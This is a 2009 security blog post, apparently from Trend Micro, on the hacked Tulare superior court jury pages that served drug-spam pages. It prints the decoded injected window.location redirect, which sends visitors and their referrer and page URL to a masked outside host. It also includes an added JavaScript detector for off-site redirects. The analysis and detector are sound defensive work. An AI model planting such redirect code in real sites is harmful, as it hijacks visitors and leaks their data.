Oct 5
7:51 am (UTC-7)   |   by Ivan Macalintal (Advanced Threats Researcher)

Something’s hot in California and it’s not Angelina. Barely two days after a CA .gov site was confirmed to have been hacked, Trend Micro received reports that another CA county .gov Web site is deep in porn trouble. The jury section of the Tulare superior court Web site http://www. tularesuperiorcourt.ca.gov/jury/ has been compromised, serving such pages as:

* http://www. tularesuperiorcourt.ca.gov/jury/propecia.html
* http://www. tularesuperiorcourt.ca.gov/jury/meridia.html
* http://www. tularesuperiorcourt.ca.gov/jury/valium.html
* http://www. tularesuperiorcourt.ca.gov/jury/xanax.html
* http://www. tularesuperiorcourt.ca.gov/jury/adipex.html
* http://www. tularesuperiorcourt.ca.gov/jury/levitra.html
* http://www. tularesuperiorcourt.ca.gov/jury/cialis.html

Below is a screenshot of one of the said compromised pages:



The encrypted tag inserted into the hacked page decodes to:

window.location=("http://{BLOCKED}yurls.com/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=&se=&ur=1&HTTP_REFERER="+encodeURIComponent(document.URL)+"&default_keyword={CBOSKEYWORD}");

…ultimately, leading to the site http://{BLOCKED}yurls.com/in.cgi?. As of this writing, the said page redirects to another site and displays the following:



Trend Micro has duly notified the proper authorities and is working with US-CERT to mitigate this attack.

Further analysis provided by Trend Engineer Benson Sy.
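For site owners checking their own pages, the following is an added example (not part of the original post or Trend Micro's tooling) that scans already-decoded script text for a `window.location` assignment pointing at a host other than the site's own and notes whether the referrer and page URL are passed along, as in the decoded tag above. The host names `redirector.example` and `www.court.example` and the sample script are constructed; a target that is built from a variable instead of a leading string literal is not detected.

```javascript
// Added example (not from the original post). Host names are constructed.
// Collect the right-hand side of every `window.location = ...;` assignment,
// scanning character by character so a ';' inside a string literal does not end it.
function redirectExpressions(script) {
  const out = [];
  const re = /\b(?:window|document)\.location(?:\.href)?\s*=(?!=)/g;
  while (re.exec(script) !== null) {
    const start = re.lastIndex;
    let i = start, quote = null;
    for (; i < script.length; i++) {
      const c = script[i];
      if (quote) {
        if (c === "\\") i++;                 // skip the escaped character
        else if (c === quote) quote = null;
      } else if (c === '"' || c === "'") quote = c;
      else if (c === ";" || c === "\n") break;
    }
    out.push(script.slice(start, i).trim());
    re.lastIndex = i;
  }
  return out;
}

// Report assignments whose first string literal names a host other than siteHost.
function findOffsiteRedirects(script, siteHost) {
  const site = siteHost.toLowerCase();
  const findings = [];
  for (const expr of redirectExpressions(script)) {
    const lit = /(["'])((?:\\.|(?!\1).)*)\1/.exec(expr);
    const m = lit && /^(?:https?:)?\/\/([^\/?#:]+)/i.exec(lit[2]);
    if (!m) continue;                        // relative target stays on the site
    const host = m[1].toLowerCase();
    if (host === site || host.endsWith("." + site)) continue;
    findings.push({
      host,
      leaksReferrer: /document\.referrer/.test(expr),
      leaksPageUrl: /document\.URL\b/.test(expr),
    });
  }
  return findings;
}

// Constructed sample: a benign on-site redirect plus one shaped like the decoded tag.
const SAMPLE = [
  'window.location = "/jury/index.html";',
  'window.location=("http://redirector.example/in.cgi?2&seoref="' +
    '+encodeURIComponent(document.referrer)+"&parameter=&se=&ur=1&HTTP_REFERER="' +
    '+encodeURIComponent(document.URL)+"&default_keyword=kw");',
].join("\n");
console.log(findOffsiteRedirects(SAMPLE, "www.court.example"));
```

The check only helps once the inserted tag has been decoded; run it over the decoded text of any script block that was not part of the page as published.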




© Copyright 2009 Trend Micro Inc. All rights reserved. Legal Notice